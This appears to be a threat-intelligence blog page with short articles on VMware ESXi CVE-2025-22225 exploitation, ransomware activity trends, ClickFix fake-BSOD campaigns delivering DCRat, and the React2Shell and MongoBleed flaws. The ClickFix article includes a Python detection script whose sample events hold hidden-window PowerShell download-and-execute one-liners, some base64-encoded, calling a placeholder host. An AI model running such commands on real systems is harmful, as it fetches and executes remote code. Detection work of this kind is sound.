Ransomware groups are actively exploiting CVE-2025-22225, a VMware ESXi arbitrary write vulnerability that allows attackers to escape the VMX sandbox and gain kernel-level access to the hypervisor. Although VMware (Broadcom) patched this flaw in March 2025, threat actors had already exploited it in the wild, and CISA recently confirmed that threat actors are exploiting CVE-2025-22225 in active campaigns.
What’s Notable and Unique
Chinese-speaking threat actors abused this vulnerability at least a year before disclosure, via a compromised SonicWall VPN chain.
Threat researchers have observed sophisticated exploit toolkits, possibly developed well before public disclosure, that chain this bug with others to achieve full VM escape. Evidence points to targeted activity, including exploitation via compromised VPN appliances and automated orchestrators.
Attackers with VMX level privileges can trigger a kernel write, break out of the sandbox, and compromise the ESXi host. Intrusions observed in December 2025 showed lateral movement, domain admin abuse, firewall rule manipulation, and staging of data for exfiltration.
CISA has now added CVE-2025-22225 to its Known Exploited Vulnerabilities (KEV) catalog, underscoring ongoing use by ransomware attackers.
Analyst Comments
Compromise of ESXi hypervisors significantly amplifies operational impact, allowing access to and potential encryption of dozens of VMs simultaneously. Organizations running ESXi 7.x and 8.x remain at high risk if patches and mitigations have not been applied. Arete therefore recommends that clients apply the VMware patches from VMSA-2025-0004 across all ESXi, Workstation, and Fusion deployments. Enterprises are also advised to assess their setups in order to reduce risk, as protecting publicly accessible management interfaces is a fundamental security best practice.
Sources
CVE-2025-22225 in VMware ESXi now used in active ransomware attacks
The Great VM Escape: ESXi Exploitation in the Wild
VMSA-2025-0004: VMware ESXi, Workstation, and Fusion updates address multiple vulnerabilities (CVE-2025-22224, CVE-2025-22225, CVE-2025-22226)
Read More

Article
Feb 5, 2026
Ransomware Trends & Data Insights: January 2026
Although Akira was once again the most active ransomware group in January, the threat landscape was more evenly distributed than it was throughout most of 2025. In December 2025, the three most active threat groups accounted for 57% of all ransomware and extortion activity; in January, the top three accounted for just 34%. Akira’s dominance also decreased to levels more consistent with early 2025, as the group was responsible for almost a third of all attacks in December but just 17% in January.
The number of unique ransomware and extortion groups observed in January increased slightly, to 17, up from 14 in December. It is too early to assess whether this trend will be the new normal for 2026. It is also worth noting that overall activity in January was lower than in previous months, consistent with what Arete typically observes at the beginning of a new year.

Article
Jan 20, 2026
Click-Fix Attacks Now Using Fake Blue Screen of Death
The ClickFix social engineering technique has gained significant popularity across the threat landscape since it emerged in 2025. It leverages fake error dialog boxes to deceive users into manually executing malicious PowerShell commands, typically by copying a command from the fake dialog and pasting it into the Windows Run dialog (Win+R). This technique is commonly delivered through compromised websites, malicious documents, HTML attachments, or phishing URLs, and has been associated with a wide range of malware families, including AsyncRAT, DarkGate, NetSupport, and Lumma Stealer.
More recently, threat researchers have identified an evolution of this technique targeting the hospitality sector. This campaign combines ClickFix lures with fake CAPTCHA prompts and counterfeit Blue Screen of Death (BSOD) messages to manipulate users into pasting attacker-controlled code. Because the user executes the code themselves, the approach sidesteps controls aimed at malicious attachments and ultimately results in the deployment of the Russian-linked DCRat malware.

Figure 1. Example of a fake BSOD used to trick victims (Source: Securonix)
What’s Notable and Unique
This latest campaign leverages phishing emails impersonating Booking.com, using Euro-denominated reservation cancellation charges to create urgency and direct victims to fraudulent websites.
These websites use fake CAPTCHA challenges and counterfeit BSOD messages as social engineering lures, targeting hospitality organizations, particularly European entities, during the peak holiday season.
This social engineering technique ultimately deceives users into executing malicious code that abuses MSBuild.exe to deploy a Russian-linked DCRat payload, enabling persistent remote access, process hollowing, keylogging, and secondary payload delivery.
Analyst Comments
ClickFix social engineering techniques continue to evolve. Earlier-identified variants such as FileFix trick users into copying malicious scripts that are then executed through the Windows File Explorer address bar rather than the Run dialog, and the latest campaign employs fake BSOD prompts to deceive victims and deploy DCRat malware, underscoring the importance of vigilance against emerging social engineering threats. To defend against these attacks, organizations should provide ongoing employee training to recognize and respond to social engineering techniques, ensure software is downloaded only from trusted sources, restrict PowerShell usage to privileged administrators, and monitor for command interpreters and MSBuild.exe being launched from explorer.exe or from user-writable locations, since a pasted ClickFix command leaves exactly that process chain in endpoint telemetry.
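The process chain described above (explorer.exe spawning PowerShell with a pasted one-liner, then MSBuild.exe building a project file from a user-writable path) is something endpoint telemetry can be searched for directly. The following is an added detection example written for this summary, not code from Arete or from the Securonix research it cites. It runs over constructed process-creation events in the shape of Sysmon Event ID 1 (parent image, image, command line); the indicator list, the choice of explorer.exe as the launcher of interest, and the user-writable path list are assumptions drawn from the general description of the technique rather than from this specific campaign.

```python
"""Detect ClickFix/FileFix-style execution chains in process-creation telemetry.

Added example for this article; the events below are constructed, not real logs.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Alert:
    rule: str
    event: ProcessEvent
    indicators: list


# Both the Run dialog (ClickFix) and the File Explorer address bar (FileFix)
# spawn the pasted command as a child of explorer.exe.  (Assumption.)
LAUNCHERS = {"explorer.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Indicators common to pasted ClickFix one-liners (assumed from public write-ups
# of the technique, not from this article).  Matched case-insensitively.
SHELL_INDICATORS = {
    "hidden_window": r"-(?:w|windowstyle)\s+hidden",
    "exec_policy_bypass": r"-(?:ep|exec|executionpolicy)\s+bypass",
    "invoke_expression": r"\biex\b|invoke-expression",
    "remote_fetch": r"\birm\b|\biwr\b|invoke-restmethod|invoke-webrequest|downloadstring",
    "base64_decode": r"frombase64string",
}
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# Paths a browser or a pasted script can write to; MSBuild.exe building a
# project file from here is not a developer workflow.  (Assumption.)
USER_WRITABLE = re.compile(
    r"\\appdata\\|\\temp\\|\\users\\public\\|\\downloads\\|\\programdata\\", re.I
)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of a -EncodedCommand argument (UTF-16LE base64), or ''."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""


def _shell_hits(text: str) -> list:
    return [name for name, pat in SHELL_INDICATORS.items() if re.search(pat, text, re.I)]


def scan(events) -> list:
    """Return one Alert per event that matches a ClickFix-style rule."""
    alerts = []
    for ev in events:
        image, parent, cl = _basename(ev.image), _basename(ev.parent_image), ev.command_line
        if image in SHELLS and parent in LAUNCHERS:
            # Scan the visible command line with the base64 blob masked out, so the
            # blob cannot produce false word-boundary hits, then scan the decoded blob.
            hits = _shell_hits(ENCODED_CMD.sub("-enc <blob>", cl))
            hits += ["decoded:" + h for h in _shell_hits(_decode_encoded_command(cl))]
            if hits:
                alerts.append(Alert("clickfix_shell_from_explorer", ev, hits))
        if image == "msbuild.exe":
            reasons = []
            if USER_WRITABLE.search(cl):
                reasons.append("project_file_in_user_writable_path")
            if parent in SHELLS | LAUNCHERS:
                reasons.append("parent_" + parent)
            if reasons:
                alerts.append(Alert("msbuild_inline_task_abuse", ev, reasons))
    return alerts


# Constructed sample telemetry (not real events).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
ENC_PAYLOAD = base64.b64encode("iex (irm https://example.invalid/a)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    ProcessEvent(EXPLORER, PS, "powershell.exe"),  # user opened a shell: benign
    ProcessEvent(EXPLORER, PS, 'powershell.exe -w hidden -nop -ep bypass -c "iex (irm https://example.invalid/verify)"'),
    ProcessEvent(EXPLORER, PS, f"powershell.exe -w hidden -enc {ENC_PAYLOAD}"),
    ProcessEvent(r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
                 r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
                 r'MSBuild.exe "C:\src\app\app.csproj"'),  # developer build: benign
    ProcessEvent(PS, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
                 r"MSBuild.exe C:\Users\u\AppData\Local\Temp\build.xml"),  # dropped project file
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(a.rule, a.indicators, "<-", a.event.command_line[:60])
```

The first rule deliberately does not fire on a bare `powershell.exe` launched from the Run box, only on the combination of that parent and the hidden-window, policy-bypass, or download-and-execute primitives a pasted lure needs; decoding `-EncodedCommand` matters because the fake BSOD page can hand the user an opaque blob just as easily as readable text. The second rule is the MSBuild half of the chain: a legitimate build from Visual Studio against a source tree passes, while MSBuild.exe reading a project file from `%TEMP%` with a PowerShell parent does not.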
Sources
Analyzing PHALT#BLYX: How Fake BSODs and Trusted Build Tools Are Used to Construct a Malware Infection
Think before you Click(Fix): Analyzing the ClickFix social engineering technique
Read More

Article
Jan 12, 2026
Ransomware Trends & Data Insights: December 2025
Consistent with the second half of 2025, Akira continues to dominate the ransomware landscape. In December, the group was responsible for over a third of all ransomware and extortion engagements observed by Arete. Akira was also responsible for 10% more ransomware attacks than the second and third most active groups, Qilin and INC Ransom, combined. Collectively, the top three most active threat groups in December accounted for about 57% of all activity Arete observed during the month.

Figure 1. Activity from the top 3 threat groups in December 2025
Throughout the month of December, analysts at Arete identified several distinct trends among the threat actors perpetrating cybercrime activities:
In addition to Akira, Qilin, and INC, there has recently been an uptick in engagements attributed to RansomHouse, a group that Arete had not observed since early 2024. Reporting from December 2025 indicated that the group updated its encryption code to make it more efficient, which could partly explain the increase in RansomHouse engagements observed in November and December.
In early December, a maximum-severity flaw was reported in React Server Components, part of the widely used React JavaScript library, that allows unauthenticated remote attackers to execute code on vulnerable instances. The vulnerability, tracked as CVE-2025-55182 and also known as React2Shell, was assigned a maximum CVSS severity rating of 10.0, with an estimated 39% of cloud environments affected at the time the vulnerability was disclosed. Organizations should prioritize immediate patching to address React2Shell (CVE-2025-55182) and ensure all internet-facing applications, including frameworks that bundle React Server Components, are updated to the vendor-recommended versions.
In late December 2025, a high-severity, pre-authentication memory-disclosure vulnerability was disclosed that affects MongoDB Server versions 3.6 and later, prior to the patched releases. Referred to as MongoBleed (CVE-2025-14847), the vulnerability enables unauthenticated attackers to send malformed network messages that cause the server to return uninitialized memory, which can contain sensitive data such as credentials, tokens, and API keys. While the flaw does not allow remote code execution and no ransomware campaigns have been confirmed, researchers have linked it to real-world abuse, including a suspected Ubisoft Rainbow Six Siege backend compromise. Data leaked from such incidents could enable follow-on attacks, including ransomware. Because the flaw requires no authentication, enabling access control is not a mitigation on its own: organizations with publicly exposed MongoDB servers affected by the vulnerability should immediately patch to the latest version and, as a general measure, avoid exposing the database port to the internet.
Sources
Arete Internal
Read More
